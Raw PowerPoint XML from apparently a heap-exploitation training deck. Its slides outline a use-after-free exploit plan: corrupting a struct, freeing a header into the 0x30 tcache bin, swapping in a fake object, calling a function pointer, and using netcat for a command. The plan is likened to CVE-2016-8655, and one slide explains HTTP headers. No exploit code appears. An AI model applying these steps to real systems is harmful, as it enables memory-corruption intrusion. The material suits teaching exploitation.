        <p:spPr>
          <a:xfrm>
            <a:off x="3245000" y="1268019"/>
            <a:ext cx="5727770" cy="3325801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026FAC07-8955-6A4C-9CE0-4EFC5920789A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="54245" y="2914273"/>
            <a:ext cx="3463685" cy="1731843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23349015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B2A-1853-DC4C-8F91-DA7FFFFD7CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF Solution Throwback</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B062E6-0C7D-E74D-BA47-2E2CA23614EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3457737" y="1369219"/>
            <a:ext cx="5686263" cy="2515582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F271F73-3DDC-104B-BA9C-1D75C1191326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1102936"/>
            <a:ext cx="4252404" cy="3963420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Player Struct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UAF object gets corrupted by another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40616929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Your Turn to Create Exploit Plan!</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8" y="1236540"/>
            <a:ext cx="8399849" cy="932163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Trigger use after free on header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x30 TCache bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct header</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769856FC-6B2E-CD40-A51B-53165A08E553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4042387" y="2154116"/>
            <a:ext cx="4902200" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27FB61B5-1C4C-9349-9CED-77518D51E295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4694175" y="4235236"/>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1" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754F7F2D-5DA3-A441-89E0-ED5FB7258354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209456" y="2203634"/>
            <a:ext cx="3892630" cy="1983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dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Swap in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fake object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>into header slot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Call function pointer for the win </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> for command</a:t>
            </a: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2" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6B4B57-A0EA-D947-AC90-B71FBEF5C5F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139713" y="4516719"/>
            <a:ext cx="3750360" cy="6267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Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exploit similar to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2016-8655</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A100DCE-9FDA-3141-9B42-91F2B3A51BCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7538602" y="3146971"/>
            <a:ext cx="254143" cy="80735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32953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190984" y="2832637"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3413CD-2EE2-AF4C-8FA7-FB902645CFCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6413953" y="2534347"/>
            <a:ext cx="684271" cy="18786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B70131-6B53-854D-B0B1-121A1039CBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7040312" y="2251207"/>
            <a:ext cx="1743559" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168032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63EF-1F57-DC44-ADE0-F6B0CF01E079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Chunk – 0x30 TCache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="TCache bins">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BA56C1-2F8B-B943-BC1B-51A3778B7CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="28051" r="47855"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7679412" y="0"/>
            <a:ext cx="1464588" cy="4224669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Graphical user interface, text, application, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D7E155-EAEF-BE47-9C3E-13D0CE2C56BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="14513"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1366711"/>
            <a:ext cx="7722562" cy="2802333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA9E69A-2251-3B4E-9530-9FB9ECE30FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053884" y="2166212"/>
            <a:ext cx="563363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02D9E05-3E6F-7540-8AD3-BB9C0DAB2027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2056881" y="3682463"/>
            <a:ext cx="256936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7BD0CB8-C7F2-D54A-A7E0-71742CD47AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3682463"/>
            <a:ext cx="75844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1755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2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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Free the header to trigger UAF</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7" name="Picture 6" descr="Header is free - in the TCache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C23C957-81DE-F54B-82F2-D578ED1DCA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1532659"/>
            <a:ext cx="6710766" cy="3050348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1939130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11649-6195-BC46-85D2-D74D4D946BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Headers – 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA902B4A-5F20-2547-95E5-062C01562C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="5328267" cy="3255560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the information in the BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSON, plain/text, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows more than 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on a given socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drops headers in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B504D3C-CC6E-B442-A511-D4177C1F68F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530788" y="1012910"/>
            <a:ext cx="3613212" cy="2321337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15185134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85AB-D1A4-8C49-BB29-45F3DCEC7A26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
